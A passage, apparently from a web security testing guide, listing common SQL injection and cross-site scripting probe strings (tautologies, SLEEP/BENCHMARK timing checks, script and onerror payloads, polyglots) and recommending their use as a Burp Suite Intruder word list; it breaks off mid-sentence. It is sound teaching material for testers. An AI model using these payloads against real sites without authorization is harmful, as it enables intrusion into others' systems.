Here is a list of other common strings that you can use to detect vulnerabilities:
|
Common testing strings |
|
' |
|
> |
|
'> |
|
'>"> |
|
'1 or 1==1-- |
|
' or 1==1 |
|
[] |
|
{} |
|
article.php?title=<meta%20http-equiv="refresh"%20content="0;"> |
|
'><script>alert(1)</script> |
|
"><img src="x:x" onerror="alert(0)"> |
|
"><iframe src="javascript:alert(0)"> |
|
<img%20src='aaa'%20onerror=alert(1)> |
|
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ |
|
'%2Bbenchmark(3200,SHA1(1))%2B' |
|
'+BENCHMARK(40000000,SHA1(1337))+' |
|
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> |
|
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext></|><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&amp;amp;lpar; 1)"/alt="/"src="/"onerror=eval(id&amp;amp;%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> |
|
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)// |
|
\%22})))}catch(e){alert(document.domain);}// |
|
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);// |
|
"a")(({type:"ready"}));}catch(e){alert(1)}// |
I recommend that you save these strings in a TXT file and use them as a word list in Burp Suite's Intruder tool. In this way, you can launch the testing string for all the fields in a HTTP request, and then look for the same string using the Search option in the HTTP | Proxy:
